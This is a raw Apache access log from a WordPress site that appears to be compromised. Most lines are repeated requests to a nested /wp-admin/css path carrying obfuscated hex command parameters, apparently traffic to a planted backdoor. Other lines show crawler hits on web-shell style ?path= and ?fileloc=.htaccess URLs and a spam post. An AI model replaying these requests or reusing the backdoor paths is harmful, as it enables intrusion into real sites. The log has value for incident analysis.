142.4.205.1 - - [15/Oct/2025:16:21:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333236372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393636372q6265653731656361333166323664323935623031393137353332376133393538222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:21:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333238372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393638372q6435323933666364376361663364613937353938313836356334343766626137222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [15/Oct/2025:16:22:42 -0400] "GET /?_g=1268712 HTTP/1.0" 200 25564 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:16:21:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333330372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393730372q6535336338626361613532636635643436396264656333323837313663383739222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:22:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333332372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393732372q6463613162333131623664613365306261383338613361333635616336303761222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
204.12.208.18 - - [15/Oct/2025:16:23:09 -0400] "GET /wp-content/xf8aaa4/index.php HTTP/1.0" 503 5078 "https://academiedumarketing.com/wp-content/xf8aaa4/index.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
204.12.208.18 - - [15/Oct/2025:16:23:09 -0400] "GET /wp-content/xf8aaa4/index.php HTTP/1.0" 503 5078 "https://academiedumarketing.com/wp-content/xf8aaa4/index.php" "Mozilla/4.0 (compatible; GoogleToolbar 5.0.2124.2070; Windows 6.0; MSIE 8.0.6001.18241)"
204.12.208.18 - - [15/Oct/2025:16:23:09 -0400] "GET /wp-content/xf8aaa4/index.php HTTP/1.0" 503 5078 "https://academiedumarketing.com/wp-content/xf8aaa4/index.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; Sleipnir/2.9.8)"
142.4.205.1 - - [15/Oct/2025:16:22:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333334372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393734372q3763626263666639356366336637353437303939366163636563383264356335222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [15/Oct/2025:16:23:40 -0400] "GET /?_g=1040039 HTTP/1.0" 200 25854 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.195 - - [15/Oct/2025:16:23:40 -0400] "GET /?_g=571884 HTTP/1.0" 200 24555 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:16:22:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333336372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393736372q6464383032616364396630366136393637316530316232396136323839326537222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [15/Oct/2025:16:24:03 -0400] "GET /?_g=1135681 HTTP/1.0" 200 25551 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:16:23:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333338372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393738372q3834386366393531626664373366326337626434336665343937373939303163222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:23:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333430372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393830372q3039363038313338656433396638383665666666336235333364643032363662222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:23:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333432372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393832372q3230353133396137653934636361376164646361353036386635363366336537222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
50.62.183.56 - - [15/Oct/2025:16:24:50 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9014 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
142.4.205.1 - - [15/Oct/2025:16:24:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333434372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393834372q6235303331363131663130383434633032376134396332626239616465393139222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:24:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333436372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393836372q3363663934356230383861666264343766303330643436313865346638373466222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:24:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333438372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393838372q3861363165633332366565393031353635646539613664373237363835353631222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [15/Oct/2025:16:25:51 -0400] "GET /?_g=1261291 HTTP/1.0" 200 24589 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.196 - - [15/Oct/2025:16:25:54 -0400] "GET /market/46177852.htm HTTP/1.0" 200 24188 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:16:25:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333530372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393930372q6163333764323738306262323962656637363561326236663264373433643063222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [15/Oct/2025:16:26:08 -0400] "GET /product/edit/A3580660463 HTTP/1.0" 200 24348 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:16:25:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333532372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393932372q3132663539663333383864366532363933333066643136346462316638393266222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:25:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333534372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393934372q6463356566383338656336383831643132653566363236366462643731306239222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:26:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333536372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393936372q3836346462633966356362346137313234613766666137303438383434303836222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:26:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333538372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303535393938372q3137363761323465633364653564383663656565313138623838646265303732222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [15/Oct/2025:16:27:38 -0400] "GET /?_g=1765056 HTTP/1.0" 200 24606 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:16:26:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333630372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303030372q6436626135323661396432376337353666656564336663326634653865333239222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.145.188 - - [15/Oct/2025:16:27:51 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/latest-posts HTTP/1.0" 200 7341 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:16:27:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333632372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303032372q6631336134663861326464353861616164336236356532353266323138386336222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [15/Oct/2025:16:28:24 -0400] "GET /zhHant/product/surugaya/A2961557923?campaign_uid=f64d716db5e979ed2f947dbaf4296895b951ae7f HTTP/1.0" 200 25410 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:16:27:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333634372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303034372q3437393934623134396236313730363431373865343830646638346665386538222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [15/Oct/2025:16:28:43 -0400] "GET /?_g=788320 HTTP/1.0" 200 25027 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:16:27:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333636372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303036372q6466393439616564333731393263616262663862396632616237396166336430222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [15/Oct/2025:16:28:46 -0400] "GET /?_g=1586548 HTTP/1.0" 200 25114 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.196 - - [15/Oct/2025:16:28:46 -0400] "GET /market/55706409.htm HTTP/1.0" 200 24977 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [15/Oct/2025:16:28:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333638372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303038372q3737353535643239373766333261363135346666656539343765376539346661222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.131.235 - - [15/Oct/2025:16:29:12 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin/css/css HTTP/1.0" 200 7143 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-admin/css" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:16:28:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333730372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303130372q3965633939626666376164346666336136343835326164346231393330613562222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:28:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333732372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303132372q3730373432333638343839623932353131363663383536313466313738333632222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:29:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333734372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303134372q3932666434646538353162303438633935366438303939633239666430613030222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:29:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333736372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303136372q6562303063316234646664666662363939326266646139373466626231666235222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.152.60 - - [15/Oct/2025:16:30:36 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/query HTTP/1.0" 200 7349 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:16:29:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333738372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303138372q6133326231373531353161346638373862636538373961336330346334326139222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:30:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333830372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303230372q6630653562353734326239373833646331653435613936613763396433626330222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:30:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333832372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303232372q3461653561376539636234383534633231323034376536363762343931613762222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:30:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333834372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303234372q3839396266393232663262613336303238353266383734623435366266613130222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.128.196 - - [15/Oct/2025:16:31:58 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/gallery HTTP/1.0" 200 7447 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [15/Oct/2025:16:31:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333836372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303236372q6138386163633061656366363432623439306465383462363336313632313165222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [15/Oct/2025:16:31:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333838372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303238372q6566613232653033383065343439663864386537653766383464336534643730222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
57.141.4.21 - - [15/Oct/2025:16:32:38 -0400] "GET /market/2274237386.htm HTTP/1.0" 200 93392 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
51.68.32.135 - - [15/Oct/2025:16:32:44 -0400] "GET /robots.txt HTTP/1.0" 200 4615 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:32:45 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/.htaccess&path=/var/www/vhosts/academiedumarketing.com HTTP/1.0" 200 7450 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [15/Oct/2025:16:31:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333930372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303330372q6235663864333232346433333836633431623833336532633738346164383163222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
51.68.32.135 - - [15/Oct/2025:16:32:47 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/.htaccess&path=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR HTTP/1.0" 200 6701 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
